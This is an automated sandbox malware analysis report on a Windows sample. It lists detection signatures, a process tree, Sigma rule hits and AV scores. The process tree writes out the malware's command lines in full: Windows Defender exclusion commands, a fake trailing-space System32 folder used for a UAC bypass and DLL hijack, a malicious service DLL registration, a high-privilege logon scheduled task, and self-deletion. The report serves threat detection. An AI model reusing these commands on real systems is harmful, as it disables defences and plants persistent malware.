Windows Analysis Report
58VSNPxrI4.exe

Overview

General Information

Sample name: 58VSNPxrI4.exe
renamed because original name is a hash value
Original sample name: 228c09c31156d45dfe94195bb34d1399.exe
Analysis ID: 1578892
MD5: 228c09c31156d45dfe94195bb34d1399
SHA1: 20c6ce4757be1399032b2ac6873dc505c1d02839
SHA256: b76ecfa778793bdf379a63b55d60b4b3941e10b743e48ae3b414b3522212abdb
Tags: exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: TrustedPath UAC Bypass Pattern
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Creates a Windows Service pointing to an executable in C:\Windows
Drops executables to the windows directory (C:\Windows) and starts them
Found API chain indicative of debugger detection
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Self deletion via cmd or bat file
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious New Service Creation
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to create an SMB header
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file does not import any functions
PE file overlay found
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Uses the system / local time for branch decision (may execute only at specific dates)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

  • System is w10x64
  • 58VSNPxrI4.exe (PID: 3576 cmdline: "C:\Users\user\Desktop\58VSNPxrI4.exe" MD5: 228C09C31156D45DFE94195BB34D1399)
    • cmd.exe (PID: 5372 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4464 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5964 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3020 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 6064 cmdline: cmd.exe /c mkdir "\\?\C:\Windows \System32" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3032 cmdline: cmd.exe /c start "" "C:\Windows \System32\printui.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 1272 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • printui.exe (PID: 3580 cmdline: "C:\Windows \System32\printui.exe" MD5: 2FC3530F3E05667F8240FC77F7486E7E)
        • cmd.exe (PID: 3392 cmdline: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6896 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Add-MpPreference -ExclusionPath 'C:\Windows\System32';" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 7108 cmdline: cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048 MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • sc.exe (PID: 7056 cmdline: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
          • reg.exe (PID: 6792 cmdline: reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)
          • sc.exe (PID: 6856 cmdline: sc start x939048 MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
        • cmd.exe (PID: 3380 cmdline: cmd.exe /c start "" "C:\Windows\System32\console_zero.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • console_zero.exe (PID: 6512 cmdline: "C:\Windows\System32\console_zero.exe" MD5: 4ECCB8F5D1EDCF18A11ABED91FF85C46)
            • cmd.exe (PID: 4320 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
              • conhost.exe (PID: 2940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • schtasks.exe (PID: 7124 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
                • conhost.exe (PID: 2544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 5708 cmdline: cmd.exe /c timeout /t 14 /nobreak && rmdir /s /q "C:\Windows \" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 3884 cmdline: timeout /t 14 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
        • cmd.exe (PID: 2216 cmdline: cmd.exe /c timeout /t 16 /nobreak && del /q "C:\Windows \System32\printui.dll" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • timeout.exe (PID: 7040 cmdline: timeout /t 16 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • cmd.exe (PID: 5608 cmdline: cmd.exe /c timeout /t 10 /nobreak && del /q "C:\Users\user\Desktop\58VSNPxrI4.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5420 cmdline: timeout /t 10 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 6848 cmdline: C:\Windows\System32\svchost.exe -k DcomLaunch MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • cmd.exe (PID: 7160 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3576 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'c:\windows\system32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5736 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 2040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 4320 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows \System32' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 3684 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 3324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7160 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'E:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
    • cmd.exe (PID: 5420 cmdline: cmd.exe /c powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3364 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'F:\' MD5: 04029E121A0CFA5991749937DD22A1D9)
  • console_zero.exe (PID: 6792 cmdline: C:\Windows\System32\console_zero.exe MD5: 4ECCB8F5D1EDCF18A11ABED91FF85C46)
    • cmd.exe (PID: 6756 cmdline: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5864 cmdline: schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup
No configs have been found
No yara matches

System Summary

Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows \System32\printui.exe" , CommandLine: "C:\Windows \System32\printui.exe" , CommandLine|base64offset|contains: , Image: C:\Windows \System32\printui.exe, NewProcessName: C:\Windows \System32\printui.exe, OriginalFileName: C:\Windows \System32\printui.exe, ParentCommandLine: cmd.exe /c start "" "C:\Windows \System32\printui.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3032, ParentProcessName: cmd.exe, ProcessCommandLine: "C:\Windows \System32\printui.exe" , ProcessId: 3580, ProcessName: printui.exe
Source: File created, Author: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\58VSNPxrI4.exe, ProcessId: 3576, TargetFilename: C:\Windows \System32\printui.dll
Source: Process started, Author: Jonathan Cheong, oscd.community: Data: Command: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Windows\System32\console_zero.exe" , ParentImage: C:\Windows\System32\console_zero.exe, ParentProcessId: 6512, ParentProcessName: console_zero.exe, ProcessCommandLine: cmd.exe /c schtasks /create /tn "console_zero" /sc ONLOGON /tr "C:\Windows\System32\console_zero.exe" /rl HIGHEST /f, ProcessId: 4320, ProcessName: cmd.exe
Source: Process started, Author: Florian Roth (Nextron Systems): Data: Command: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\58VSNPxrI4.exe", ParentImage: C:\Users\user\Desktop\58VSNPxrI4.exe, ParentProcessId: 3576, ParentProcessName: 58VSNPxrI4.exe, ProcessCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 5372, ProcessName: cmd.exe
Source: Process started, Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7108, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 7056, ProcessName: sc.exe
Source: Process started, Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: cmd.exe /c sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto && reg add HKLM\SYSTEM\CurrentControlSet\services\x939048\Parameters /v ServiceDll /t REG_EXPAND_SZ /d "C:\Windows\System32\x939048.dat" /f && sc start x939048, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7108, ParentProcessName: cmd.exe, ProcessCommandLine: sc create x939048 binPath= "C:\Windows\System32\svchost.exe -k DcomLaunch" type= own start= auto , ProcessId: 7056, ProcessName: sc.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5372, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Windows\System32'", ProcessId: 4464, ProcessName: powershell.exe
Source: Process started, Author: vburov: Data: Command: C:\Windows\System32\svchost.exe -k DcomLaunch, CommandLine: C:\Windows\System32\svchost.exe -k DcomLaunch, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k DcomLaunch, ProcessId: 6848, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: C:\Windows \System32\printui.dll, ReversingLabs: Detection: 31%
Source: C:\Windows\System32\console_zero.exe, ReversingLabs: Detection: 42%
Source: C:\Windows\System32\x939048.dat, ReversingLabs: Detection: 34%
Source: 58VSNPxrI4.exe, Virustotal: Detection: 45%
Source: 58VSNPxrI4.exe, ReversingLabs: Detection: 39%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 93.8% probability
Source: C:\Windows\System32\x939048.dat, Joe Sandbox ML: detected
Source: 58VSNPxrI4.exe, Joe Sandbox ML: detected
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462F00 OPENSSL_LH_free,OPENSSL_LH_free,EVP_CIPHER_CTX_free,CRYPTO_free,26_2_00007FFBAB462F00
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46EED0 CRYPTO_malloc,CRYPTO_free,26_2_00007FFBAB46EED0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43CED0 CRYPTO_free,memset,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB43CED0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462F60 EVP_EncryptUpdate,OPENSSL_LH_retrieve,26_2_00007FFBAB462F60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB486F60 memchr,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB486F60
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB462DB0 OPENSSL_LH_retrieve,CRYPTO_free,OPENSSL_LH_delete,OPENSSL_LH_retrieve,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,26_2_00007FFBAB462DB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41EDB0 CRYPTO_THREAD_run_once,26_2_00007FFBAB41EDB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46EDD0 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB46EDD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42CDC0 CRYPTO_malloc,CRYPTO_clear_free,26_2_00007FFBAB42CDC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB414E80 CRYPTO_free,26_2_00007FFBAB414E80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43CD10 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB43CD10
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB46ED00 OPENSSL_cleanse,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB46ED00
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434CB0 CRYPTO_zalloc,CRYPTO_new_ex_data,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free_ex_data,OPENSSL_cleanse,OPENSSL_cleanse,X509_free,EVP_PKEY_free,OSSL_STACK_OF_X509_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_clear_free,memcpy,26_2_00007FFBAB434CB0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB478CA0 CRYPTO_zalloc,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_uint,ERR_new,strcmp,OSSL_PARAM_get_uint32,ERR_new,strcmp,OSSL_PARAM_get_int,ERR_new,OSSL_PARAM_get_int,ERR_new,ERR_new,ERR_set_debug,BIO_up_ref,BIO_free,BIO_up_ref,BIO_up_ref,ERR_new,ERR_set_debug,ERR_set_error,EVP_CIPHER_is_a,EVP_CIPHER_is_a,26_2_00007FFBAB478CA0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB41ECD0 COMP_get_type,CRYPTO_malloc,COMP_get_name,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_sort,26_2_00007FFBAB41ECD0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB484CC0 EVP_MD_CTX_new,EVP_PKEY_new_raw_private_key_ex,EVP_DigestSignInit_ex,EVP_DigestSign,EVP_MD_CTX_free,EVP_PKEY_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,_time64,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,EVP_PKEY_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB484CC0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB490D80 CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB490D80
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB444D30 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,26_2_00007FFBAB444D30
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4523F0 CRYPTO_free,26_2_00007FFBAB4523F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB498414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,26_2_00007FFBAB498414
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB448400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,26_2_00007FFBAB448400
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4123C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB4123C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB452470 CRYPTO_zalloc,26_2_00007FFBAB452470
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB412460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,26_2_00007FFBAB412460
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB494460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,26_2_00007FFBAB494460
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434490
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB498426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,26_2_00007FFBAB498426
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB430450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,26_2_00007FFBAB430450
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB49844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,26_2_00007FFBAB49844C
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4722F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB4722F0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB47A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,26_2_00007FFBAB47A2E0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4982E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB4982E7
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4202B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,26_2_00007FFBAB4202B0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB45A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,26_2_00007FFBAB45A2C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4162C0 CRYPTO_clear_free,26_2_00007FFBAB4162C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB43C2C0 CRYPTO_free,26_2_00007FFBAB43C2C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB4902C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB4902C0
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB434380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,26_2_00007FFBAB434380
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB44A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,26_2_00007FFBAB44A330
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB444330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,26_2_00007FFBAB444330
Source: C:\Windows\System32\svchost.exeCode function: 26_2_00007FFBAB42A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,26_2_00007FFBAB42A330
